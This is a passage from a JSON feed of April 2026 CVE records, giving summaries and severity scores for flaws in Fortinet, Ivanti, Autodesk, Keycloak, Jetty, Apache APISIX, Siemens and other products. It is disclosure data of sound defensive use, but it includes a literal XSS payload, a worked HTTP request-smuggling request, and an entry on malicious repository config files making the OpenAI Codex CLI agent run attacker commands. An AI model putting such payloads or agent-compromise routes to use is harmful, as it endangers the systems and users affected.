FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiOS 6.2.9 through 6.2.17 allows attacker to execute unauthorized code or commands via specially crafted packets.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-125"],"published_time":"2026-04-14T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2024-23104","summary":"An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least read-only permission on system maintenance to access backup information via crafted HTTP requests","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-124"],"published_time":"2026-04-14T16:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4913","summary":"Improper protection of an alternate path in Ivanti N-ITSM before version 2025.4 allows a remote authenticated attacker to retain access when their account has been disabled.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2026-4913-CVE-2026-4914?language=en_US"],"published_time":"2026-04-14T15:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4914","summary":"Stored XSS in Ivanti N-ITSM before version 2025.4 allows a remote authenticated attacker to obtain limited information from other user sessions. User interaction is required.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2026-4913-CVE-2026-4914?language=en_US"],"published_time":"2026-04-14T15:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4344","summary":"A maliciously crafted HTML payload in a component name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg","https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe","https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005"],"published_time":"2026-04-14T15:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4345","summary":"A maliciously crafted HTML payload, stored in a design name and exported to CSV, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg","https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe","https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005"],"published_time":"2026-04-14T15:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4369","summary":"A maliciously crafted HTML payload in an assembly variant name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg","https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe","https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005"],"published_time":"2026-04-14T15:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37602","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to SQL Injection in the file /scheduler/admin/user/manage_user.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/SQL-3.md"],"published_time":"2026-04-14T15:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37980","summary":"A flaw was found in Keycloak, specifically in the organization selection login page. A remote attacker with `manage-realm` or `manage-organizations` administrative privileges can exploit a Stored Cross-Site Scripting (XSS) vulnerability. This flaw occurs because the `organization.alias` is placed into an inline JavaScript `onclick` handler, allowing a crafted JavaScript payload to execute in a user's browser when they view the login page. Successful exploitation enables arbitrary JavaScript execution, potentially leading to session theft, unauthorized account actions, or further attacks against users of the affected realm.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://access.redhat.com/security/cve/CVE-2026-37980","https://bugzilla.redhat.com/show_bug.cgi?id=2455325"],"published_time":"2026-04-14T15:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37592","summary":"Sourcecodester Storage Unit Rental Management System v1.0 is vulnerable to SQL in the file /storage/admin/maintenance/manage_pricing.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-4.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37593","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/view_att.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-1.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37594","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/view_employee.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-2.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37595","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/manage_employee.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-4.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37596","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/manage_department.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-3.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37597","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/attendance_list.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-5.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37598","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to arbitrary code execution (RCE) via /scheduler/classes/SystemSettings.php?f=update_settings.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/RCE-1.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37600","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to SQL Injection in the file /scheduler/admin/appointments/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/SQL-1.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37601","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to SQL Injection in the file /scheduler/admin/appointments/manage_appointment.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/SQL-2.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37589","summary":"SourceCodester Storage Unit Rental Management System v1.0 is vulnerable to SQL Injection in the file /storage/admin/maintenance/manage_storage_unit.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-3.md"],"published_time":"2026-04-14T15:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37590","summary":"SourceCodester Storage Unit Rental Management System v1.0 is vulnerable to SQL Injection in the file /storage/admin/rents/manage_rent.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-1.md"],"published_time":"2026-04-14T15:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37591","summary":"Sourcecodester Storage Unit Rental Management System v1.0 is vulnerable to SQL injection in the file /storage/admin/tenants/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-2.md"],"published_time":"2026-04-14T15:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30480","summary":"A Local File Inclusion (LFI) vulnerability in the NFSen module (nfsen.inc.php) of LibreNMS 22.11.0-23-gd091788f2 allows authenticated attackers to include arbitrary PHP files from the server filesystem via path traversal sequences in the nfsen parameter.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/parlakbarann/CVE-2026-30480"],"published_time":"2026-04-14T15:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69893","summary":"A side-channel vulnerability exists in the implementation of BIP-39 mnemonic processing, as observed in Trezor One v1.13.0 to v1.14.0, Trezor T v1.13.0 to v1.14.0, and Trezor Safe v1.13.0 to v1.14.0 hardware wallets. This originates from the BIP-39 standard guidelines, which induce non-constant time execution and specific branch patterns for word searching. An attacker with physical access during the initial setup phase can collect a single side-channel trace. By utilizing profiling-based Deep Learning Side-Channel Analysis (DL-SCA), the attacker can recover the mnemonic code and subsequently steal the assets. The issue was patched.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://trezor.com","https://trezor.io/vulnerability/fix-side-channel-in-bip-39-mnemonic-processing-when-unlocked"],"published_time":"2026-04-14T15:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69993","summary":"Leaflet versions up to and including 1.9.4 are vulnerable to Cross-Site Scripting (XSS) via the bindPopup() method. This method renders user-supplied input as raw HTML without sanitization, allowing attackers to inject arbitrary JavaScript code through event handler attributes (e.g., <img src=x onerror=\"alert('XSS')\">). When a victim views an affected map popup, the malicious script executes in the context of the victim's browser session.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://leaflet.com","https://github.com/PierfrancescoConti/leaflet-cve-2025-69993/blob/main/ADVISORY.md"],"published_time":"2026-04-14T15:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61260","summary":"A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers to embed arbitrary commands that execute immediately.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://openai.com","https://research.checkpoint.com/2025/openai-codex-cli-command-injection-vulnerability/"],"published_time":"2026-04-14T15:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31049","summary":"An issue in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code and escalate privileges via the CSV registration field","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://blog.hostbillapp.com/2025/12/03/hostbill-security-advisory/","https://github.com/Muhammad5235/HostBill-CVEs-2025/blob/main/Missing%20Server-Side%20Validation/Registration%20fields%20%26%20Import%20Csv","https://hostbillapp.com/changelog","https://hostbillapp.com/release-notes/11-27-2025.html","https://hostbillapp.com/release-notes/12-01-2025.html","https://hostbillapp.com/responsible-disclosure"],"published_time":"2026-04-14T14:16:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-8095","summary":"The OECH1 prefix encoding is intended to obfuscate values across the OpenEdge platform.  It has been identified as cryptographically weak and unsuitable for stored encodings and enterprise applications.  OECH1 encodings should be considered exploitable and immediately replaced by any other supported prefix encoding, all of which are based on symmetric encryption.","cvss":9.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.progress.com/s/article/Unintended-Use-of-OECH1-for-Password-Secrets-Protection"],"published_time":"2026-04-14T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-7389","summary":"A vulnerability in the AdminServer component of OpenEdge on all supported platforms grants its authenticated users OS-level access to the server\nthrough the adopted authority of the AdminServer process itself.  The delegated authority of the AdminServer could allow its users the ability to read arbitrary files on the host system through the misuse of the setFile() and openFile()\n methods exposed through the RMI interface.  Misuse was limited only by OS-level authority of the AdminServer's elevated \nprivileges granted and the user's access to these methods enabled through RMI.  The exploitable methods have been removed thus eliminating their access through RMI or downstream of the RMI registry.","cvss":8.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.2,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.progress.com/s/article/Important-Arbitrary-File-Ready-Security-Update-for-OpenEdge-AdminServer"],"published_time":"2026-04-14T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2450","summary":".NET misconfiguration: use of impersonation vulnerability in upKeeper Solutions upKeeper Instant Privilege Access allows Hijacking a Privileged Thread of Execution.This issue affects upKeeper Instant Privilege Access: through 1.5.0.","cvss":7.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.4,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.upkeeper.se/hc/en-us/articles/26783542353692-CVE-2026-2450-NET-misconfiguration-use-of-impersonation"],"published_time":"2026-04-14T13:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5307","summary":"Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":[],"published_time":"2026-04-14T13:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2024-9168","summary":"Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":[],"published_time":"2026-04-14T13:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2332","summary":"In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n  *  https://w4ke.info/2025/06/18/funky-chunks.html\n\n  *  https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at \\r\\n inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf","https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"],"published_time":"2026-04-14T12:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2449","summary":"Improper neutralization of argument delimiters in a command ('argument injection') vulnerability in upKeeper Solutions upKeeper Instant Privilege Access allows Hijacking a Privileged Thread of Execution.This issue affects upKeeper Instant Privilege Access: through 1.5.0.","cvss":9.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.upkeeper.se/hc/en-us/articles/26783425404444-CVE-2026-2449-Improper-neutralization-of-argument-delimiters-in-a-command"],"published_time":"2026-04-14T12:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24069","summary":"Kiuwan SAST improperly authorizes SSO logins for locally disabled mapped user accounts, allowing disabled users to continue accessing the application. Kiuwan Cloud was affected, and Kiuwan SAST on-premise (KOP) was affected before 2.8.2509.4.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04065,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://r.sec-consult.com/kiuwanlock","http://seclists.org/fulldisclosure/2026/Apr/5"],"published_time":"2026-04-14T12:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-13822","summary":"MCPHub in versions below 0.11.0 is vulnerable to authentication bypass. Some endpoints are not protected by authentication middleware, allowing an unauthenticated attacker to perform actions in the name of other users and using their privileges.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00043,"ranking_epss":0.13147,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert.pl/en/posts/2026/04/CVE-2025-13822","https://github.com/samanhappy/mcphub"],"published_time":"2026-04-14T11:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33892","summary":"A vulnerability has been identified in Industrial Edge Management Pro V1 (All versions >= V1.7.6 < V1.15.17), Industrial Edge Management Pro V2 (All versions >= V2.0.0 < V2.1.1), Industrial Edge Management Virtual (All versions >= V2.2.0 < V2.8.0). Affected management systems do not properly enforce user authentication on remote connections to devices.\r\nThis could facilitate an unauthenticated remote attacker to circumvent authentication and impersonate a legitimate user.\r\nSuccessful exploitation requires that the attacker has identified the header and port used for remote connections to devices and that the remote connection feature is enabled for the device.\r\n\r\nExploitation allows the attacker to tunnel to the device. Security features on this device itself (e.g. app specific authentication) are not affected.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":5.1,"epss":0.00069,"ranking_epss":0.21061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-609469.html"],"published_time":"2026-04-14T09:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33929","summary":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache PDFBox Examples.\n\nThis issue affects the \nExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.36, from 3.0.0 through 3.0.7.\n\n\nUsers are recommended to update to version 2.0.37 or 3.0.8 once \navailable. Until then, they should apply the fix provided in GitHub PR \n427.\n\nThe ExtractEmbeddedFiles example contained a path traversal vulnerability (CWE-22) mentioned in CVE-2026-23907. However the change in the releases 2.0.36 and 3.0.7 is flawed because it doesn't consider the file path separator. Because of that, a user having writing rights on /home/ABC could be victim to a malicious PDF resulting in a write attempt to any path starting with /home/ABC, e.g. \"/home/ABCDEF\".\n\nUsers who have copied this example into their production code should apply the mentioned change. The example \nhas been changed accordingly and is available in the project repository.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00019,"ranking_epss":0.04896,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/pdfbox/pull/427/changes","https://lists.apache.org/thread/j8l07tgzy9dm8d8n0f3c45h7zg7t3ld6","https://lists.apache.org/thread/op3lyx1ngzy4qycn06l6hljyf28ff0zs"],"published_time":"2026-04-14T09:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4109","summary":"The Eventin – Events Calendar, Event Booking, Ticket & Registration (AI Powered) plugin for WordPress is vulnerable to unauthorized access of data due to a improper capability check on the get_item_permissions_check() function in all versions up to, and including, 4.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary order data including customer PII (name, email, phone) by iterating order IDs.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.06614,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/changeset/3501510/","https://www.wordfence.com/threat-intel/vulnerabilities/id/87f82d5d-d89a-440d-8c23-ace5160a0739?source=cve"],"published_time":"2026-04-14T09:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25654","summary":"A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP3). Affected products do not properly validate user authorization when processing password reset requests. This could allow an authenticated remote attacker to bypass authorization checks, leading to the ability to reset the password of any arbitrary user account.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00045,"ranking_epss":0.13521,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-605717.html"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27668","summary":"A vulnerability has been identified in RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) (All versions < V5.8). User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00039,"ranking_epss":0.11602,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-741509.html"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31908","summary":"Header injection vulnerability in Apache APISIX.\n\nThe attacker can take advantage of certain configuration in forward-auth plugin to inject malicious headers.\nThis issue affects Apache APISIX: from 2.12.0 through 3.15.0.\n\nUsers are recommended to upgrade to version 3.16.0, which fixes the issue.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08028,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/sob643s5lztov7x579j8o0c444t36n6b","http://www.openwall.com/lists/oss-security/2026/04/14/3"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31923","summary":"Cleartext Transmission of Sensitive Information vulnerability in Apache APISIX.\n\nThis can occur due to `ssl_verify` in openid-connect plugin configuration being set to false by default.\nThis issue affects Apache APISIX: from 0.7 through 3.15.0.\n\nUsers are recommended to upgrade to version 3.16.0, which fixes the issue.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02003,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/0pjs72l7qj83j3srw1l1toyj24bsgkds","http://www.openwall.com/lists/oss-security/2026/04/14/1"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31924","summary":"Cleartext Transmission of Sensitive Information vulnerability in Apache APISIX.\n\ntencent-cloud-cls log export uses plaintext HTTP\nThis issue affects Apache APISIX: from 2.99.0 through 3.15.0.\n\nUsers are recommended to upgrade to version 3.16.0, which fixes the issue.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02003,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/sqxjjlt87c1q28db28ztdxylm5pgwohq","http://www.openwall.com/lists/oss-security/2026/04/14/2"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-40745","summary":"A vulnerability has been identified in Siemens Software Center (All versions < V3.5.8.2), Simcenter 3D (All versions < V2506.6000), Simcenter Femap (All versions < V2506.0002), Simcenter STAR-CCM+ (All versions < V2602), Solid Edge SE2025 (All versions < V225.0 Update 13), Solid Edge SE2026 (All versions < V226.0 Update 04), Tecnomatix Plant Simulation (All versions < V2504.0008). Affected applications do not properly validate client certificates to connect to Analytics Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":6.3,"epss":0.00017,"ranking_epss":0.04095,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-981622.html"],"published_time":"2026-04-14T09:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24032","summary":"A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP3 with UMC). The affected application contains an authentication weakness due to insufficient validation of user identity in the UMC component.\r\nThis could allow an unauthenticated remote attacker to bypass authentication and gain unauthorized access to the application. (ZDI-CAN-27564)","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0005,"ranking_epss":0.15482,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-801704.html"],"published_time":"2026-04-14T09:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2582","summary":"The The Germanized for WooCommerce plugin for WordPress is vulnerable to arbitrary shortcode execution via 'account_holder' parameter in all versions up to, and 